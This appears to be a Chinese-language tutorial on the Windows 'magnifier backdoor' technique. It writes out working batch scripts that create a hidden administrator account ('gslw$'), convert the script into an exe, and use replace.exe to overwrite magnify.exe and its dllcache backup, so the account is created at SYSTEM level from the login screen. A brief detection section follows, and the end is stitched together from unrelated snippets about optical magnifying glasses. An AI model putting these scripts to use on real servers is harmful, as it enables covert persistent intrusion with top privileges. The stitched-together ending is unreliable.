放大鏡(magnify.exe)是windows 2000/xp/2003系統整合的乙個小工具,它是為方便視力障礙使用者而設計的。在使用者登入系統前可以通過「win+u」組合鍵呼叫該工具,因此攻擊者就用精心構造的magnify.exe同名檔案替換放大鏡程式,從而達到控**務器的目的。
通常情況下,攻擊者通過構造的magnify.exe程式建立乙個管理員使用者,然後登入系統。當然有的時候他們也會通過其直接呼叫命令提示符(cmd.exe)或者系統shell(explorer.exe)。需要說明的是,這樣呼叫的程式都是system許可權,即系統最高許可權。不過,以防萬一當管理員在執行放大鏡程式時發現破綻,攻擊者一般通過該構造程式完成所需的操作後,最後會執行真正的放大鏡程式,以矇騙管理員。其利用的方法是:
(1).構造批處理指令碼
@echo off
net user gslw$ test168 /add
net localgroup administrators gslw$ /add
%windir%\system32\nagnify.exe
exit
將上面的指令碼儲存為magnify.bat,其作用是建立乙個密碼為test168的管理員使用者gslw$,最後執行改名後的放大鏡程式nagnify.exe。(圖2)
(2).檔案格式轉換
因為批處理檔案magnify.bat的字尾是bat,必須要將其轉換為同名的exe檔案才可以通過組合鍵win+u呼叫。攻擊者一般可以利用winrar構造乙個自動解壓的exe壓縮檔案,當然也可以利用bat2com、com2exe進行檔案格式的轉換。我們就以後面的方法為例進行演示。
開啟命令列,進入bat2com、com2exe工具所在的目錄,然後執行命令「bat2com magnify.bat」將magnify.bat轉換成magnify.com,繼續執行命令「com2exe magnify.com」將magnify.com轉換成magnify.exe,這樣就把批處理檔案轉換成和放大鏡程式同名的程式檔案。(圖3)
(3).放大鏡檔案替換
下面就需要用構造的magnify.exe替換同名的放大鏡程式檔案,由於windows對系統檔案的自我保護,因此不能直接替換,不過windows提供了乙個命令replace.exe,通過它我們可以替換系統檔案。另外,由於系統檔案在%windir%\system32\dllcache中有備份,為了防止檔案替換後又重新還原,所有我們首先要替換該目錄下的magnify.exe檔案。假設構造的magnify.exe檔案在%windir%目錄下,我們可以通過乙個批處理即可實現檔案的替換。
@echo off
copy %windir%\system32\dllcache\magnify.exe nagnify.exe
copy %windir%\system32\magnify.exe nagnify.exe
replace.exe %windir%\magnify.exe %windir%\system32\dllcache
replace.exe %windir%\magnify.exe %windir%\system32
exit
上面批處理的功能是,首先將放大鏡程式備份為nagnify.exe,然後用同名的構造程式將其替換。(圖4)
(4).攻擊利用
當完成上述操作後,乙個放大鏡後門就做成了。然後攻擊者通過遠端桌面連線伺服器,在登入介面視窗摁下本地鍵盤的「win+u」組合鍵,選擇執行其中的「放大鏡」,此刻就在伺服器上建立了乙個管理員使用者gslw$並開啟了放大鏡工具,然後攻擊者就開業通過該帳戶登入伺服器。當然,攻擊者在斷開登入前會刪除所有與該帳戶相關的資訊,以防被管理員發現。(圖5)
(5).防範措施
進入%windir%\system32\檢視magnify.exe的檔案圖示是否是原來的放大鏡的圖示,如果不是的話極有可能被植入了放大鏡後門。當然,有的時候攻擊者也會將其檔案圖示更改為和原放大鏡程式的圖示一樣。此時我們可以檢視magnify.exe檔案的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。我們也可以先執行magnify.exe,然後執行lusrmgr.msc檢視是否有可疑的使用者。如果確定伺服器被放置了放大鏡後門,首先要刪除該檔案,然後恢復正常的放大鏡程式。當然,我們也可以做得更徹底一些,用乙個無關緊要的程式替換放大鏡程式。甚至我們也可以以其人之道還治其人之身,構造乙個magnify.exe,通過其警告攻擊者或者進行入侵監控和取證。
補充:與放大鏡後門類似的還有「粘滯鍵」後門,即按下shief鍵五次可以啟動粘滯鍵功能,其利用和防範措施與放大鏡後門類似,只是將magnify.exe換成了sethc.exe。
放大鏡 放大鏡應該怎麼選擇,有那些放大鏡
放大鏡是用以放大物體的凸透鏡,顯微鏡的雛形。通常用來觀察物體細節。放大鏡是焦距比眼的明視距離小得多的會聚透鏡。放大鏡按外表分類可以分為可攜式放大鏡 眼鏡式放大鏡和立式放大鏡。按使用人群分類,可分為老年人閱讀放大鏡 兒童放大鏡 戶外便攜放大鏡 專業鑑定測量放大鏡和醫用放大鏡等。台式放大鏡就是可以固定的...
放大鏡 講課 《放大鏡》教學設計
放大鏡 教學設計 寧波市鄞州區宋詔橋小學 竺紅波 教學目標 科學概念 1 放大鏡是凸透鏡,具有放大物體影象,看清更多細節的作用。2 放大鏡鏡片的特點是透明和中間厚,邊緣薄 鏡片凸度越大,放大倍數越大。3 放大鏡廣泛應用在人們學習 生活 生產的許多方面。過程與方法 1 經歷觀察工具共同點和不同點的對比...
放大鏡 史上最小放大鏡 奈米放大鏡能看到單原子活動
史上最小放大鏡能有多小?放大鏡定義 放大鏡 英文名稱 magnifier 用來觀察物體微小細節的簡單目視光學器件,是焦距比眼的明視距離小得多的會聚透鏡。物體在人眼視網膜上所成像的大小正比於物對眼所張的角 視角 史上最小放大鏡能 數百年來科學家們一直堅信,光跟所有其他波一樣,不能被聚焦到比它們的波長更...